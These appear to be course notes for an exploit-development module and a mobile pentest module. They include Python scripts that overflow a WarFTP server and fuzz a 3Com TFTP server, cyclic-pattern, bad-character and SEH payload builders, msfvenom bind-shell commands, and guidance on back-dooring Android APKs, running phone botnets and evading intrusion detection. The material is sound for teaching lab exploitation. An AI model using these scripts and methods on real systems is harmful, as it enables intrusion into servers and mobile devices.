
Module 12: Exploit Development

Lesson 12.1: Exploit Development Introduction (Part 1)
Skills Learned From This Lesson: Intro

Lesson 12.2: Exploit Development (Part 2) A Program in Memory
Skills Learned From This Lesson: Stack Theory, Buffer Overflows, x86 Registers
● Buffer Overflow - An anomaly where a program, while writing data to a memory buffer,
overruns the buffer's boundary and overwrites adjacent memory locations.
● Stack - Region of memory where data is added or removed in a last-in-first-out (LIFO)
manner. The PUSH instruction puts data on the stack, the POP instruction removes data from
the stack. On x86 the stack grows toward lower addresses, while a buffer is written toward
higher addresses, which is why an overflow reaches the saved return address.
● Register - A quickly accessible location available to a CPU usually consisting of a small
amount of fast storage.
● x86 Registers (16-bit/32-bit/64-bit names)
○ IP/EIP/RIP: Instruction pointer. Holds the program counter, the address of the
next instruction. Not directly writable; an overflow changes it by overwriting a
saved return address that is later popped into it.
○ SP/ESP/RSP: Stack pointer, the address of the top of the stack.
○ BP/EBP/RBP: Stack base pointer, the address of the current stack frame.
○ SI/ESI/RSI: Source index for string operations.
○ DI/EDI/RDI: Destination index for string operations.
○ AL/AH/AX/EAX/RAX: Accumulator (also holds a function's return value).
○ BL/BH/BX/EBX/RBX: Base index (for use with arrays).
○ CL/CH/CX/ECX/RCX: Counter (for use with loops and strings).
○ DL/DH/DX/EDX/RDX: Extends the precision of the accumulator (e.g. combine
32-bit EAX and EDX for 64-bit integer operations in 32-bit code).

Lesson 12.3: Exploit Development (Part 3) Stack Frame for Function
Skills Learned From This Lesson: Buffer Overflow Exploitation, Vulnerable C Functions
● In C, argv[0] is the name of the program itself. All other subsequent command line
arguments are numbered starting with 1.
● strcpy - a function that does no bounds checking when writing to memory. Copying an
argument longer than the destination keeps writing past the end of the buffer, over the
rest of the stack frame (saved EBP) and into the saved return address and beyond.
Other classic offenders are strcat, sprintf and gets.
● char buffer[N] - declares a buffer of N bytes on the stack; the program itself has to
enforce that at most N bytes are ever written to it.

Lesson 12.4: Exploit Development (Part 4) GNU Compiler
Skills Learned From This Lesson: Debugging, Assembly, Hex Codes
● GNU C Compiler (gcc) - Default C compiler found in Linux.
○ > gcc -g -fno-stack-protector -o "output_filename" "input.c" - Compiles input.c
with debugging information (-g) and with the stack canary disabled
(-fno-stack-protector). To get a classic exploitable lab binary the stack also has
to be executable (-z execstack) and system ASLR disabled
(echo 0 > /proc/sys/kernel/randomize_va_space); 32-bit builds need -m32.
● Canaries - Known values placed between a buffer and control data on the stack to
detect buffer overflows. The value is checked before the function returns; if it has been
overwritten by an overflow, the check fails and the program aborts instead of returning
to the attacker's address.
● Segmentation Fault - A fault raised by hardware with memory protection, notifying an
operating system (OS) about a memory access violation.
● GDB - GNU Debugger, used by default in Linux.
○ (gdb) list (firstline#),(lastline#) - Prints the lines of code in the boundaries
specified.
○ (gdb) break (line#) - Sets a breakpoint at the specified line
○ (gdb) run (arguments) - Runs the program with the specified arguments in the
debugger.
○ (gdb) disassemble (function) - Produces the assembly output of a function.
○ (gdb) set disassembly-flavor intel - Changes the assembly format from the default
AT&T syntax to Intel syntax.
○ (gdb) info registers - Prints all registers and their accompanying data values in
Hexadecimal to the screen.
● Breakpoint - Marks a point in code where execution will pause.
● Hexadecimal - A positional numeral system with a base of 16. It uses sixteen distinct
symbols, most often the symbols 0–9 to represent values zero to nine, and A–F to
represent values ten to fifteen.
● https://www.asciitable.com/
● Using a long series of A's or any other character in the argument field and looking for a
segmentation fault is a great way to test if a binary is vulnerable to a buffer overflow.

Lesson 12.5: Exploit Development (Part 5) Python
Skills Learned From This Lesson: Return Address, Python Scripting, Exploit Development
● In Hexadecimal, two characters = one byte, so a 32-bit address is 8 hex characters and
the 4 A's that overwrite it show up in EIP as 0x41414141.
● By overwriting the return address during a buffer overflow exploit, the attacker can then
specify an executable place in memory the program should return to and continue from
after the exploited function completes. If the specified return address does
not refer to an executable place in memory, a segmentation fault will occur.
● It's a good idea to use a scripting language to print a series of characters (several 'A's
followed by several 'B's, etc.) to trace the key data areas essential for exploitation; the
debugger then shows which marker landed in EIP and which register points at the rest.

Lesson 12.6: Exploit Development (Part 6) Executing Unintended Code
Skills Learned From This Lesson: Little-Endianness, Big-Endianness, Buffer Overflow Exploit
● To execute unintended code during a buffer overflow exploit, fill the argument with
enough arbitrary data to overwrite memory up until the return address, then write the
address of the code you want to run (the shellcode you placed in the buffer, or an
instruction such as jmp esp that lands on it) in place of the saved return address, as raw
bytes. When the function returns, execution continues at that address.
● Endianness - The sequential order in which bytes are arranged into larger numerical
values when stored in memory or when transmitted over digital links. Intel x86 is
little-endian while the IBM System/360 and network byte order are big-endian.
○ Big-endian - the value 0x12345678 is stored as the bytes 12 34 56 78
○ Little-endian - the value 0x12345678 is stored as the bytes 78 56 34 12
● The endianness of the target system should be considered when developing a buffer
overflow exploit: an address read in the debugger as 0x12345678 has to be sent as the
bytes \x78\x56\x34\x12 on x86.
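Assembling the overflow buffer described in Lessons 12.5 and 12.6, as an added example that is not from the course. Python's struct module does the endianness conversion, so the address is written once as the number the debugger shows and packed into the byte order the target needs. The offset, the return address and the total length are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Added example (not from the course): building a return-address-overwrite
buffer with struct, which handles little- vs big-endian packing."""
import struct


def pack_addr(addr, little=True):
    """Encode a 32-bit address as the 4 bytes that overwrite the saved return
    address. x86 is little-endian, so 0x080484b6 is written b6 84 04 08."""
    return struct.pack("<I" if little else ">I", addr)


def unpack_addr(raw, little=True):
    """Reverse operation: the 4 bytes found in memory back to the number the
    debugger displays (e.g. b'AAAA' -> 0x41414141)."""
    return struct.unpack("<I" if little else ">I", raw)[0]


def build_overflow(offset, ret_addr, shellcode, total_len, little=True):
    """Layout: [padding to the return address][new return address][shellcode][filler]
    offset    bytes of junk needed to reach the saved EIP (found with a cyclic pattern)
    ret_addr  where execution should land: a 'jmp esp' or the shellcode itself
    total_len keep the overall size constant so the crash conditions do not change
    """
    payload = b"A" * offset + pack_addr(ret_addr, little) + shellcode
    if len(payload) > total_len:
        raise ValueError("payload exceeds buffer size")
    return payload + b"D" * (total_len - len(payload))


if __name__ == "__main__":
    addr = 0x080484b6  # assumed address of the code we want to run
    print(pack_addr(addr).hex())         # b6840408: little-endian, what x86 needs
    print(pack_addr(addr, False).hex())  # 080484b6: big-endian, what you read in the debugger
    buf = build_overflow(485, addr, b"\xcc" * 8, 1100)   # 0xcc = int3, a visible breakpoint
    print(len(buf), buf[485:489].hex(), hex(unpack_addr(b"AAAA")))
```

Sending the buffer is the same socket code as the warftpskel.py scripts above; only the contents of buffer change.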

Lesson 12.7: Exploit Development (Part 7) Network Based Exploits and Debuggers
Skills Learned From This Lesson: Network Buffer Overflow, Immunity Debugger, WarFTP
Exploitation
● Immunity Debugger - A debugger developed for the Windows Platform. It can be
attached to a running service or program to analyze its execution in real time, or
launch the program itself so that its state (pause, step, restart) is controlled from the
debugger. Attaching to the target service before sending the test string lets you see the
crash and the register contents at the moment of the access violation.
● For network-based exploit development, a script can be created in your preferred
scripting language to open a socket and submit a test string (usually consisting of 'A's)
into any of the available input fields to test for buffer overflow vulnerabilities. The results
can be seen if a debugger has been set to analyze and log execution on the target host.
● WarFTP Daemon - A free FTP server for Windows.
● > warftpskel.py
    #!/usr/bin/env python3
    # Skeleton for the WarFTP USER overflow test: connect, read the banner and send
    # 1100 'A's as the username while Immunity Debugger is attached to the server.
    import socket

    buffer = b"A" * 1100                     # test string, long enough to overwrite EIP
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)                          # a crashed server never answers; don't hang forever
    s.connect(("192.168.5.44", 21))          # target FTP server
    response = s.recv(1024)                  # banner
    print(response)
    s.send(b"USER " + buffer + b"\r\n")      # note the space: the command is "USER <name>"
    response = s.recv(1024)
    print(response)
    s.send(b"PASS PASSWORD\r\n")
    s.close()

Lesson 12.8: Exploit Development (Part 8) Creating a Cyclic Pattern
Skills Learned From This Lesson: Cyclic Patterns, !Mona, Memory Corruption Preventions
● mona - A PyCommand (Python plugin) for Immunity Debugger that assists with exploit
development: generating and locating cyclic patterns, finding jump instructions and
POP POP RET sequences, comparing bad characters and generating Metasploit module
skeletons.
● > !mona pattern_create 1100 - Creates an 1100 character cyclic pattern.
● > !mona findmsp - Tells mona to search memory and the registers for the generated
cyclic pattern. Doing this reports the offset at which each register (EIP, ESP, ESI, ...)
was overwritten.
● A cyclic pattern can be generated with mona and injected into a buffer overflow
vulnerable program to help map the return address easier: because every short chunk
of the pattern is unique, the value found in EIP identifies the exact offset.
● DLL Rebase - When the Windows operating system has to load a DLL into memory at an
address other than its preferred base because another DLL is already loaded at that
location. Addresses taken from a rebased or ASLR-enabled module will not be stable.
● Address Space Layout Randomization (ASLR) - A technique used in memory corruption
prevention that randomizes the base addresses of the stack, heap, loaded modules and
executable on each run, so the addresses an attacker would normally hard-code in a
memory corruption exploit change. Introduced into Windows in Windows Vista.
● Data Execution Prevention (DEP) - Marks sections of memory such as the stack and heap
as non-executable as a mitigation against buffer overflow exploitation; shellcode placed
there will fault instead of running.
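A Metasploit-style cyclic pattern generator and the offset lookup that !mona findmsp performs, as an added example that is not from the course, so the EIP value read out of the debugger can be turned into an offset without the tool. The pattern scheme (Aa0Aa1...) is the one pattern_create.rb uses; the sample offset in the usage is an assumption.

```python
#!/usr/bin/env python3
"""Added example (not from the course): cyclic pattern creation and offset lookup."""
import itertools
import string


def pattern_create(length):
    """Same scheme as Metasploit's pattern_create: Aa0Aa1...Aa9Ab0... The 3-byte
    groups never repeat within the 20280-byte cycle, so a 4-byte chunk read from a
    register identifies its position in the buffer."""
    if length > 20280:
        raise ValueError("pattern is only unique up to 20280 bytes")
    out = bytearray()
    for u, l, d in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase, string.digits):
        out += (u + l + d).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern, needle):
    """Offset of a chunk as it appears in memory (e.g. copied from a stack dump),
    or -1 if the chunk is not part of the pattern."""
    return pattern.find(needle)


def offset_from_register(pattern, value):
    """Offset for a value read out of a 32-bit register such as EIP. The register
    shows the bytes in little-endian order, so 0x41306141 in EIP means the bytes
    b'Aa0A' were written over the saved return address, in that order."""
    return pattern.find(value.to_bytes(4, "little"))


if __name__ == "__main__":
    p = pattern_create(1100)
    print(p[:24].decode())
    # Pretend the debugger showed EIP = 0x41306141 after the crash:
    print("EIP offset:", offset_from_register(p, 0x41306141))
    # Assumed crash where the bytes at 485 land in EIP, to show the round trip:
    eip = int.from_bytes(p[485:489], "little")
    print(hex(eip), "->", offset_from_register(p, eip))
```

Send the pattern in place of the A's, read EIP from the debugger, and feed the value to offset_from_register; that offset becomes the A-count in the verification script of the next lesson.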

Lesson 12.9: Exploit Development (Part 9) Verifying Offsets
Skills Learned From This Lesson: Bad Characters, 'jmp' Function, Locating Functions
● After using a tool like mona to map the offsets of the registers, it's best practice to
manually verify the validity of this data.
● > warftpskel.py
    #!/usr/bin/env python3
    # Verify the offset mona reported: 485 'A's up to the saved return address, 4 'B's
    # where EIP should land, 4 'C's just past it, and 'D's to fill the rest of the 1100
    # bytes. If the offset is right, EIP reads 42424242 in the debugger; the register
    # that points at the C's is the one to jump through.
    import socket

    # buffer = b"A" * 1100
    buffer = b"A" * 485 + b"B" * 4 + b"C" * 4
    buffer += b"D" * (1100 - len(buffer))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect(("192.168.5.44", 21))
    response = s.recv(1024)
    print(response)
    s.send(b"USER " + buffer + b"\r\n")
    response = s.recv(1024)
    print(response)
    s.send(b"PASS PASSWORD\r\n")
    s.close()
● Encountering a bad character when developing exploits will truncate, transform or
otherwise render useless any following exploit code. Which characters are bad follows
from the protocol specification and from how the program interprets the data (for FTP,
\x00 ends a C string and \x0a\x0d ends the command). Be sure to always identify the bad
characters for the protocol you're working with and make sure the exploit is free of them.
● Hard-coding a stack address in an exploit makes it unstable, because the exact stack
position shifts with environment, thread and input length. It is better practice to point
the return address at a 'jmp esp' (or equivalent) instruction in a module that is not
rebased and not ASLR-enabled, so that execution lands on the buffer wherever the
stack happens to be.
● > !mona jmp -r esp -cpb '\x00\x0a\x0d\x40' - Mona/Immunity will locate 'jmp esp'
(and equivalent) instructions, skipping any whose address contains the bad characters
\x00, \x0a, \x0d or \x40.
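The bad-character test from this lesson, as an added example that is not from the course: send every byte value except the ones already known to be bad, dump the buffer from the debugger, and diff the two, repeating until the dump matches what was sent. The "server" here is a constructed stand-in that truncates at CR/LF and mangles '@', so the loop reproduces the \x00\x0a\x0d\x40 list used in the mona commands; against a real target the dump comes from the debugger (or !mona compare).

```python
#!/usr/bin/env python3
"""Added example (not from the course): iterative bad-character discovery.
fake_ftp_server is a constructed stand-in for 'send it and dump memory'."""


def badchar_buffer(exclude=(0x00,)):
    """All 256 byte values in ascending order minus the excluded ones, so each
    position is predictable when compared with the memory dump."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_char(sent, dumped):
    """Compare what was sent with what landed in memory. Returns the first byte
    that differs or is missing, or None if the dump matches. Everything after a
    mangled byte is unreliable, so only the first mismatch is trusted per round."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def discover_bad_chars(send_and_dump, known=(0x00,)):
    """Drive the loop: exclude what is known, send, diff, add the culprit, repeat.
    send_and_dump is a callable taking the bytes sent and returning the bytes found
    in memory. Returns the full bad-character list in discovery order."""
    bad = list(known)
    while True:
        sent = badchar_buffer(bad)
        culprit = find_bad_char(sent, send_and_dump(sent))
        if culprit is None:
            return bad
        bad.append(culprit)


def fake_ftp_server(data):
    """Constructed stand-in for the target: the command parser stops at LF or CR
    and replaces '@' (0x40) with a space before the data reaches the buffer."""
    data = data.split(b"\x0a")[0].split(b"\x0d")[0]
    return data.replace(b"\x40", b"\x20")


def as_msfvenom_arg(bad):
    """Format the list the way msfvenom -b and mona -cpb expect it."""
    return "".join("\\x%02x" % b for b in bad)


if __name__ == "__main__":
    bad = discover_bad_chars(fake_ftp_server)
    print(as_msfvenom_arg(bad))   # \x00\x0a\x0d\x40
```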

Lesson 12.10: Exploit Development (Part 10) Creating Shell Code in Kali Linux
Skills Learned From This Lesson: Generating Shellcode, Exploit Debugging, OpCodes
Generation
● > msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x40' -s 607 -f py - Creates a
bind TCP payload that avoids the specified bad characters, limited to 607 bytes of
space, in Python format, and prints it to the screen. Because bad characters are
specified, msfvenom encodes the payload, by default with Shikata Ga Nai.
● Shikata Ga Nai is a polymorphic encoder and will most likely encode the same payload
differently on every run, so regenerate and retest rather than assume two runs match.
● Encoding a payload can sometimes cause corruption of the payload in memory during
the decoding phase, because the decoder stub writes to the stack close to the shellcode.
Debugging the payload and adjusting the stack pointer first (e.g. a small sub esp or a
short NOP sled ahead of the decoder) may assist in dialing in an in-development exploit.
● Metasm - A Ruby based assembler / disassembler / compiler. Can be used to easily
create opcodes from assembly. Can be found by default in
/usr/share/metasploit-framework/tools/metasm_shell.rb on Kali Linux.
(https://github.com/jjyg/metasm)

Lesson 12.11: Exploit Development (Part 11) Fuzzing
Skills Learned From This Lesson: Fuzzing, Python Programming, Buffer Overflow Methodology

● Fuzzing - Automated software testing technique that involves providing invalid,
unexpected or random data as inputs to a program and watching for crashes.
● > 3comfuzzer.py
    #!/usr/bin/env python3
    # Fuzz the mode field of a TFTP write request (WRQ) with growing buffers:
    # 100, 200, 300, ... 5100 bytes. Watch the debugger on the target for the crash.
    import socket

    bufferarray = [b"A" * 100]
    addition = 200
    while len(bufferarray) <= 50:
        bufferarray.append(b"A" * addition)
        addition += 100
    for value in bufferarray:
        # opcode 2 (WRQ) | filename | NUL | mode | NUL ; the mode field carries the fuzz string
        tftppacket = b"\x00\x02" + b"Georgia" + b"\x00" + value + b"\x00"
        print("Fuzzing with length " + str(len(value)))
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.settimeout(3)                          # UDP: a crashed server simply never answers
        s.sendto(tftppacket, ("ip.address.of.target", 69))
        try:
            response = s.recvfrom(2048)
            print(response)
        except socket.timeout:
            print("No response: the service may have crashed at this length")
            break
        finally:
            s.close()
● Buffer Overflow Exploit Development Methodology
○ Create a fuzzing script to find how many characters are required to trigger a
memory access violation
○ Verify the crash in the debugger and note which registers hold the test string
○ !mona pattern_create 500 #Create a cyclic pattern and send it in place of the A's
○ !mona findmsp #Find the offset to EIP and the offset to ESI (or whichever
register points into the buffer)
○ !mona jmp -r esi -cpb 'bad,characters,here' #Find a jmp or equivalent instruction to
get to the ESI register
○ Don't forget to write the address little-endian for Intel architecture
○ > msfvenom -p <some windows payload> -s <however much space> -b
'bad,characters' -f py #Generate shellcode in Python format
○ Offsets will be important here. Make sure to appropriately pad where necessary,
then re-run and confirm in the debugger that EIP holds the jmp address and the
shellcode sits where the register points.

Lesson 12.12: Exploit Development (Part 12) Public Exploits in Perl
Skills Learned From This Lesson: Public Exploits, NOP Sleds, Exploitation using Perl
● Public exploits can be utilized, but it will likely be necessary to replace any shellcode
with custom-generated shellcode (never run someone else's opaque payload), tune the EIP,
ESI and any other applicable register offsets to apply to the target's platform, and edit
any code (e.g. NOP sled sizes) necessary for the exploit to function on your target machine.
● NOP Sled/Slide/Ramp - A sequence of NOP (No Operation, \x90 on x86) instructions meant
to 'slide' the CPU's instruction execution flow to its final, desired destination whenever the
program branches to a memory address anywhere in the slide, which makes the exploit
tolerant of small errors in the return address.

Lesson 12.13: Exploit Development (Part 13) Turning a 3Com Exploit into a Metasploit Module
Skills Learned From This Lesson: Module Programming, msftidy.rb, IDS Evasion
● If there are any Metasploit Modules using the same protocol or having a similar attack
vector, it would be worthwhile to use bits of those modules to build your own.
● Specifying the payload space and bad characters in a custom msf module is extremely
important as metasploit will generate the payload.
● Also make sure to customize the Targets and the program's return address for that
platform.
● Any exploit that uses static strings in its payload code becomes easy for an Intrusion
Detection System to signature and possibly expose your activity. It's a good
practice to use random text where possible (Metasploit's Rex::Text.rand_text_alpha) to
avoid this.
● > /usr/share/metasploit-framework/tools/msftidy.rb - A ruby script designed to check a
custom Metasploit Module for correct formatting and other possible issues. This is
essential prior to submission for review by Rapid7 for possible inclusion into the
mainstream of the framework.

Lesson 12.14: Exploit Development (Part 14) Structured Exception Handler Overwrite
Skills Learned From This Lesson: SEH Overwrites, POP POP RET, SafeSEH, Short Jumps
● Structured Exception Handler (SEH) - A mechanism in Windows that makes use of a
"Linked List" containing a sequence of data records. When an exception takes place on
a Windows machine, the OS will attempt to handle the exception according to the
instructions on the list, going from top to bottom. As this happens, the exception handler
will evaluate if it is appropriate to handle the exception. If not, it will notify windows to
continue down the list.
● When developing an exploit for a program using SEH, since control of the program will
be passed to the registered handler when an exception is thrown, it is necessary to
overwrite the SEH record on the stack, which a large enough overflow reaches even
when the saved return address is never used (the overflow itself often raises the
exception that triggers the handler).
● Each SEH record is 8 bytes long on 32-bit Windows, containing a pointer to the next
SEH record (nSEH) followed by the pointer to the exception handler itself. When the
handler is invoked, a pointer to the overwritten record sits at ESP+8 on the stack, which
is what the POP POP RET sequence below takes advantage of.
● POP POP RET - An instruction sequence essential to creating SEH exploits. The handler
pointer in the overwritten SEH record is pointed at a POP POP RET found in a loaded
module. When the exception is dispatched, the two POPs discard the top two stack
entries and the RET then returns to the address at ESP+8, which is the pointer to the
overwritten record itself. Execution therefore lands in the 4 attacker-controlled nSEH
bytes, where a short jump carries it to the shellcode.
● > !mona seh -cpb '\x00\x0a\x0d\x40' - Mona will search for POP POP RET sequences
in memory while omitting addresses that contain the bad characters.
● SafeSEH - A linker option that records the addresses of a module's legitimate
exception handlers in its header. When an exception occurs, Windows refuses to call a
handler that is not in that table, so a POP POP RET must come from a module built
without SafeSEH (mona's listing shows the flag per module).
● Short JMP (\xeb) - A two-byte opcode: the JMP and a signed 8-bit displacement
relative to the end of the instruction (the Instruction Pointer after the jump has been
fetched), giving a reach of -128 to +127 bytes.
● metasm > jmp $+8 - Generates the hex for an instruction to JMP from the present spot in
memory forward 8 bytes, i.e. "\xeb\x06": 6 bytes beyond the end of the 2-byte jump.
● "Finding Bad Characters with Immunity Debugger and Mona.py"
(https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/)
● SEH Exploit Development Methodology
○ Crash the program
○ Find the offset to SEH with '!mona pattern_create <length>'
○ '!mona findmsp' and look for the SEH entry
○ Verify the offset to nSEH
○ Find a POP/POP/RET with '!mona seh -cpb <bad chars>'
○ Put its address in little-endian form in the SEH handler field
○ Put a short jump in nSEH over SEH: \xeb\x06 + 2 bytes of padding
○ Create and place the shellcode after SEH
○ Be sure to retain the conditions that caused the program to crash.
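The SEH overwrite layout from this lesson, as an added example that is not from the course. short_jmp() encodes the two-byte jump that goes in nSEH (so the \xeb\x06 for jmp $+8 can be derived rather than memorized), and build_seh_payload() assembles [junk][nSEH][SEH][shellcode] at a constant total length. The offset, the POP POP RET address and the int3 shellcode are assumptions; the real values come from !mona findmsp and !mona seh.

```python
#!/usr/bin/env python3
"""Added example (not from the course): encoding a short jump and assembling
an SEH-overwrite buffer. Offsets and addresses are illustrative assumptions."""
import struct


def short_jmp(distance):
    """Encode 'jmp $+distance' as EB xx. The displacement is relative to the end of
    the 2-byte instruction, so jmp $+8 is EB 06: skip the 4-byte handler address
    plus 2 bytes of padding. Reach is -128..+127 from the end of the jump."""
    rel = distance - 2
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range: %d" % distance)
    return b"\xeb" + struct.pack("<b", rel)


def build_seh_payload(offset_to_nseh, ppr_addr, shellcode, total_len):
    """offset_to_nseh  bytes before the nSEH field (from findmsp, verified by hand)
    ppr_addr         address of a POP POP RET in a module without SafeSEH
    Flow after the exception: handler -> POP POP RET -> RET lands in nSEH ->
    jmp $+8 -> shellcode placed directly after the SEH field."""
    nseh = short_jmp(8) + b"\x90\x90"          # EB 06 90 90
    seh = struct.pack("<I", ppr_addr)          # little-endian for x86
    payload = b"A" * offset_to_nseh + nseh + seh + shellcode
    if len(payload) > total_len:
        raise ValueError("payload exceeds buffer size")
    return payload + b"D" * (total_len - len(payload))   # keep the crash conditions


def parse_seh_record(buf, offset_to_nseh):
    """Read the 8-byte record back the way the debugger's SEH chain view shows it:
    (nSEH bytes, handler address as a number)."""
    nseh = buf[offset_to_nseh:offset_to_nseh + 4]
    handler = struct.unpack("<I", buf[offset_to_nseh + 4:offset_to_nseh + 8])[0]
    return nseh, handler


if __name__ == "__main__":
    print(short_jmp(8).hex())       # eb06, what metasm prints for jmp $+8
    buf = build_seh_payload(1000, 0x7c874413, b"\xcc" * 16, 1200)  # assumed values
    print(parse_seh_record(buf, 1000))
```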

Teaching Assistant Extra Credit:


● In addition to the aforementioned debuggers, the NSA developed a reverse engineering
framework named Ghidra that is an easy to use tool to assist in reverse engineering
malware and various binary files. (https://github.com/NationalSecurityAgency/ghidra)

Module 13: SPF

Lesson 13.1: SPF Introduction
Skills Learned From This Lesson: Intro

Lesson 13.2: SPF (Part 2) Attach to Smartphone Based Apps
Skills Learned From This Lesson: Smartphone Pentest Framework, SPF Prerequisites,
Uploading Applications
● Be sure to set the correct IP Address within the
'Smartphone-Pentest-Framework/frameworkconsole/config' file.
● The MySQL and Apache services must be running as well.
● SPF can be used to create and upload applications to Android devices.
● Android Debug Bridge (ADB) - A command-line tool that allows a user to communicate
with an Android device (install packages, pull files, get a shell) over USB or the network.
● If direct access to the device is not possible, the application can be hosted on the
Apache2 web server and the download link delivered via SMS or NFC.

Lesson 13.3: SPF (Part 3) Turning an Android App into an SPF Agent
Skills Learned From This Lesson: APK Back-dooring, Metasploit Integration, Agent Deployment
● SPF can decompile an APK, inject a back-door and recompile the APK. The app will
retain all of its preexisting functionality and provide the back-door to the attacker; the
rebuilt APK is signed with the tester's own key, so it no longer carries the original
developer's signature.
● The Android "Master Key" vulnerabilities (patched by Google in 2013) let a modified
APK pass signature verification as if it were the unmodified original, so on an unpatched
device a back-doored app could transparently replace the legitimate one without the
original developer's signing key.
● Communication with the deployed agent can be done either via SMS or HTTP.
● Metasploit mobile exploits can also be used in conjunction with SPF.

Lesson 13.4: SPF (Part 4) Functionality for Agents
Skills Learned From This Lesson: Agent Botnets, APK Exfiltration, Reverse-engineering APKs
● SPF can turn a mobile device into a bot and use it to send malicious messages to other
devices, possibly adding those to the botnet as well.
● An application can also be pulled from a back-doored device for reverse-engineering
and possible exploitation. A company's internal application is a worthwhile
target for this functionality.
● When communicating with an agent, SPF is programmed to communicate as a normal
application would, with the goal of hiding its malicious activity amongst normal
traffic.

Lesson 13.5: SPF (Part 5) Pentesting Mobile Devices
Skills Learned From This Lesson: Perimeter Bypassing, Pivoting, C Compilation for Android
● Using nmap through an agent could allow an attacker to bypass a company's network
perimeter and do an internal scan from an infiltrated Android smartphone. This could
even allow a penetration tester to pivot to other vulnerable devices on the internal
network from the back-doored smartphone.
● Smartphone Pentest Framework can also be leveraged with
msfvenom/Metasploit/Meterpreter and Python scripts to create custom shellcode to
exploit target services on other hosts that would normally be inaccessible, as well as
the agent itself and other potentially vulnerable mobile devices.
● SPF also comes with a cross-compiler so that C can be compiled to run on the ARM
architecture present in Android devices.

Teaching Assistant Extra Credit

● The Smartphone Pentest Framework has since been superseded by Dagah
(https://www.shevirah.com/dagah/).
● Another tool for mobile application testing, notably on iOS, is Frida, a dynamic
instrumentation toolkit that injects JavaScript into running processes to hook and
modify their functions (https://github.com/frida/frida).